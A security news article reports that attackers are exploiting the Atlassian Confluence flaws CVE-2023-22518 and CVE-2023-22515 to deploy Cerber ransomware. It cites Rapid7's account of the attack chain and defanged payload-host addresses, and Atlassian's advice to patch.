Critical Atlassian Bug Exploited in Ransomware Attacks

Written by

Security researchers have warned that threat actors are already exploiting a critical Atlassian vulnerability for which a public exploit was found just last week.

The Australian software developer said last Thursday that it had discovered “publicly posted critical information” about CVE-2023-22518, which has a CVSS score of 9.1 and impacts all versions of Atlassian Confluence Data Center and Server.

Then over the weekend, Rapid7 said it had observed exploitation of the vulnerability in “multiple customer environments,” as well as attacks using an older flaw, CVE-2023-22515, which is a critical broken access control bug discovered on October 4.

The security vendor explained that the process execution chain was consistent across multiple environments, hinting at mass exploitation of vulnerable internet-facing Atlassian Confluence servers.

“After the initial enumeration activity, the adversary executed Base64 commands to spawn follow-on commands via python2 or python3,” it added in a blog post.

“In multiple attack chains, Rapid7 observed post-exploitation command execution to download a malicious payload hosted at 193.43.72[.]11 and/or 193.176.179[.]41, which, if successful, led to single-system Cerber ransomware deployment on the exploited Confluence server.”

Read more on Atlassian threats: Atlassian Patches Critical Authentication Flaw in Jira Software

For its part, Atlassian updated its own security advisory, nudging the CVSS score of CVE-2023-22518 up to 10.0 “due to the change in the scope of the attack.”

Customers are urged to update to the latest version of the product as soon as possible, although Atlassian Cloud users are not affected.

According to the non-profit ShadowServer, there are over 24,000 Confluence servers currently online, although it’s not clear how many remain on vulnerable software versions.

Atlassian initially warned that CVE-2023-22518 could allow an attacker to wipe any data they find in affected Confluence environments, although not exfiltrate it.

Image credit: T. Schneider /

What’s hot on Infosecurity Magazine?